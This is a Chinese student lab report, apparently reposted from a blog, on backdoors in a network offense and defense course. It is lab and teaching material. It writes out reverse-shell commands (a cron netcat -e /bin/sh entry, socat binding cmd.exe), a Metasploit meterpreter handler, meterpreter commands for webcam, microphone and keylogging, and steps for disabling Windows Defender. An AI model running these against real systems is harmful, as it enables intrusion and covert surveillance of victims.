20165309 《网络对抗技术》实验二:后门原理与实践

最新推荐文章于 2024-09-15 22:47:38 发布
最新推荐文章于 2024-09-15 22:47:38 发布
阅读量167 收藏
点赞数
文章标签: 操作系统 shell 开发工具
原文链接:http://www.cnblogs.com/wsj-wsj-wsj/p/10590312.html
版权

20165309 《网络对抗技术》实验二:后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
  • 在非官网上下载破解版软件或打开不请自来的邮件的时候,后门悄然而至,易使工作站和桌面系统被蓄意利用。

(2)例举你知道的后门如何启动起来(win及linux)的方式?
  • win:点击钓鱼链接;修改注册表,增加后门自启动代码。
  • linux:实验中的cron启动。

(3)Meterpreter有哪些给你映像深刻的功能?
  • 拍照、录像、录音、获取击键记录、截屏......就是这些让人失去隐私的功能

(4)如何发现自己系统有没有被安装后门?
  • 使用查杀软件;
  • 留意不明端口和未知进程。

返回目录

2.实验总结与体会

(1)遇到的问题与解决

  • 问题一:运行可执行文件时在已关防火墙的状态下被Windows当成木马拦截:拒绝访问。
    1271290-20190321211020226-1309272385.png

  • 解决一:除了控制面板里关掉防火墙,win10里内置的Windows Defender也要关闭,当时没有发现还有这个...如果依然拒绝访问的话,可以添加排除项...在多次尝试失败后,还可以右键可执行文件->属性->安全->编辑权限。重新生成和传送后就可以运行了~
    1271290-20190321211330559-1497803720.png
    1271290-20190321211224738-671025183.png
    1271290-20190321211240178-475503871.png

  • 问题二:报错Cannot allocate memory
    1271290-20190321210437840-1919381696.png

  • 解决二:这个报错的直译是:无法分配内存。我想到了是因为内存不足,所以设置虚拟机的内存为4G(要分配的比原先大),解决问题。

(2)实验感受

跟着老师的实验指导和学姐学长们的经验博客,完成本次实验其实很容易。这次实验帮助我掌握了后门的原理,也让我在一次次利用后门的攻击中有了更直观的感受(可能还有一丝丝成功攻击了自己主机的兴奋...??)。今后一定要增强安全防范意识,定期查杀,以免自己的隐私和电脑控制权落入他人之手。

返回目录

3.实践过程记录

(0)准备工作
  • 查看本机IP地址(我在实验过程中连了3处地方的Wifi,所以换了3组IP,给自己增加了麻烦...劝告大家要使用固定的网络):
    • Windows下:ipconfig
    • Linux下:ifconfig -a(显示全部接口信息)
  • 常用后门工具——NC
    • 基本步骤是:打开监听->反弹连接->获取shell(具体指令可见下方截屏)
      • Win获得Linux Shell
        1271290-20190322103722526-727196856.png
      • Linux获得Win Shell
        1271290-20190322103754865-1803364230.png
      • nc传输数据
        1271290-20190322103803895-1937471443.png

(1)使用netcat获取主机操作Shell,cron启动
注:此时Win是攻击方,Linux是受害方
  • 在Win里用ncat.exe -l -p 5309监听5309端口

  • 在Linux环境下,用crontab -e指令编辑定时任务,选择基本的vim编辑器("3")
    1271290-20190322103811585-177046950.png

  • vim编辑器中,在最后一行插入08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh(这里的IP地址为Win攻击机的IP)并 :wq!保存退出。
  • 上述指令表示在每个小时的第8分钟反向连接Win主机的5309端口。设置规则我们可以学习:Linux定时任务Crontab命令详解
    1271290-20190324160701045-1379939214.png

  • 在8分之前,Win里输入指令,屏幕上没有反应,当8分时,Win就获得了Linux的shell,指令的内容则显示了出来:
    1271290-20190322103841354-2132236214.png

(2)使用socat获取主机操作Shell, 任务计划启动
注:此时Win是受害方,Linux是攻击方
  • 在Win的计算机管理中创建任务并新建触发器,在操作的程序或脚本中添加上socat.exe的路径,在参数栏中填写tcp-listen:5309 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5309,同时将stderr重定向到stdout上:
    1271290-20190322103849880-984906137.png
  • 按快捷键win+L锁定计算机,创建的任务就开始运行了。
    1271290-20190322104144419-670481216.png
  • 此时在Linux中输入指令socat - tcp:172.30.1.13:5309 ,发现成功获得了Win的cmd shell:
    1271290-20190322103904022-886140111.png

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
注:此时Win是受害方,Linux是攻击方
  • Linux中生成后门程序(命令见下图)
  • 使用ncat传输已生成的后门程序文件:
    • Win中监听并保存后门程序
    • Linux再向Win传输后门程序
      1271290-20190322103914496-1912849106.png
      1271290-20190322103910233-1461496488.png

1271290-20190322103937542-4582024.png

  • Linux里打开一个终端,使用msfconsole指令进入msf控制台。
  • 接着输入use exploit/multi/handler使用监听模块,设置payload。
    1271290-20190322103953601-206285269.png
  • set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload,然后设置IP和端口号:
    1271290-20190322104007371-1406364431.png
  • Linux执行监听,Win运行后门,于是Linux获得了Win主机的连接,并且得到了远程控制的shell:
    1271290-20190322104014667-1447903683.png
    1271290-20190322104033222-1619747131.png

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
注:需重复上一环节操作至exploit,此时Win是受害方,Linux是攻击方
  • 使用webcam_snap获取目标主机摄像头:
    1271290-20190322104044299-909948039.png
  • 使用screenshot获取目标主机的截屏:
    1271290-20190322104055627-66654069.png
  • 使用record_mic指令可以截获一段音频
    1271290-20190322104125344-905975766.png
  • 使用getuid查看当前目标主机用户:
    1271290-20190322104116508-295988990.png
  • 使用keyscan_start记录击键的过程,使用keyscan_dump读取击键记录:
    1271290-20190322104107605-282087574.png

返回目录

转载于:https://www.cnblogs.com/wsj-wsj-wsj/p/10590312.html

weixin_30706691
关注
20155328 《网络攻防》实验后门原理实践
weixin_34221332的博客
04-02 598
20155328 《网络攻防》实验后门原理实践 实验问题回答 1.列举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站上下载软件时候的捆绑运行。 2.列举你知道的后门如何启动起来(win及linux)的方式? 恶意用户远程控制。 3.Meterpreter有哪些给你映像深刻的功能? 抓取摄像头,感觉像电影里的黑客镜头一样,很炫酷。还有击键记录。 4.如何发现自己有系统有没有被安装后...
网络对抗技术_实验四_恶意代码技术
baoba2314的博客
10-30 186
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 潘佳昱 年级 2014 区队 2 ...
网络对抗技术 实验
b857954的博客
11-04 169
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 刘佳杰 年级 2015级 区队 网安区 ...
网络对抗技术 实验报告四
deji3388的博客
11-13 145
网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 范星甫 年级 2014级 区队 区队 指导教师 高见 信息技术网络安全学院 2016年11月7日 ...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 406
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20202407 2021-2022-2 《网络与系统攻防技术实验实验报告
m0_65266036的博客
04-19 406
本次实验所需要使用的工具相比前几次更丰富,耗时也更长。恶意代码的分析方法主要分为静态分析方法和动态分析方法。这两种方法在本次实验中都有所涉及。静态分析方法是指在不执行程序的条件下进行分析,如反汇编分析等;而动态分析方法是指在恶意代码执行的情况下,利用调试工具对恶意代码实施跟踪和观察,比如抓包等等,确定恶意代码的工作过程,以便作进一步分析。
20204323太晓梅 网络对抗技术 exp2 后门原理实践
m0_57567318的博客
03-24 192
但是我在前期仍然是遇到了很多问题,以前我总是会下意识的向别人求助,但是在本次实验中由于我碰到的问题我周围的人都没有遇到类似的,我想到老师视频中也是遇到了很多困难,但是都是通过自己的各种猜想去判断检查,上网查看解决方法,老师上课时也举例子讲了一些简单的排查流程。但由于前期耗费了大量的时间,后面在对于meterpreter的使用理解的不是很到位,只是参考别人的实验代码理解和使用命令行进行操作,对其内部的机理了解不深,本来想尝试做一下加分项的,但是最后放弃了,在这点上我还需要提高。后门便是其中的一种。
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 385
一、原理实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
[网络安全自学篇] 十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
2017-2018-2 20155228 《网络对抗技术实验后门原理实践
weixin_30588827的博客
03-28 175
2017-2018-2 20155228 《网络对抗技术实验后门原理实践 实验内容 使用netcat获取主机操作Shell,cron启动 (0.5分) 使用socat获取主机操作Shell, 任务计划启动 (0.5分) 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 使用MSF meterprete...
20155201 《网络对抗技术实验 后门原理实践
weixin_30401605的博客
03-29 161
20155201 《网络对抗技术实验 后门原理实践 零、实验准备 1. Windows获得kali linux shell 在Windows命令行中,使用ipconfig查看本机IP:10.211.55.6 先使用cd ncat命令进入程序所在目录,ncat.exe -l -p 5201使用ncat程序监听本机的5201端口 在Kali终端中,使用nc 10.211.55.6 -e /b...
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067(Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3446
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
网络攻防实验之木马攻击实验
hxxjxw的博客
07-09 1万+
这个实验网络攻防课程实验中的一个,以冰河木马为例,操作系统是XP,对于现在的安全意义不大了,但是可以看一下多年前流行的冰河木马的功能和操作。 一、实验目的和要求 (1)通过对木马的练习,使读者理解和掌握木马传播和运行的机制; (2)通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。 实验原理实验环境 实验...
4.网络编程
weixin_45476535的博客
09-14 374
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Linux入门——“Linux基本指令”上
2301_79972085的博客
09-14 809
在刚开始学习Linux时,首先需要掌握一些基本指令,以便我们能更好地使用Linux操作系统,以下指令在Ubuntu 22上执行。以下内容不过多介绍选项内容。
Linux FTP服务问题排查
最新发布
09-15 273
最近linux虚拟机重启之后发现,FTP服务总是不正常,工具无法连接。
Linux入门1
m0_62770407的博客
09-15 494
Linux的内核源码开源,所以只需要在内核的基础上加入内核程序就能形成一个完美可用的“操作系统”。虚拟机的名字密码根据自己喜好设置即可,接下来我将虚拟机放到了D盘中,大小根据需求,接下来直接点击下一步即可。第一种是绝对路径,第种是在。当不使用选项和参数,直接使用ls命令本体,表示:以平铺形式,列出当前工作目录下的内容。不同的发行版在Linux的基础部分都是相同的,本教程是以常用的CentOS为例展开。当Linux终端(命令行)打开的时候,会默认以用户的HOME目录作为当前的工作目录。
网络安全:后门技术与评估
"网络后门-计算机网络安全" 网络后门网络安全中是一个重要的概念,它涉及到攻击者如何维持对目标系统的长期...在实践中,我们不仅要防止后门的植入,还要不断提升系统和网络的安全性,以应对日益复杂的网络威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值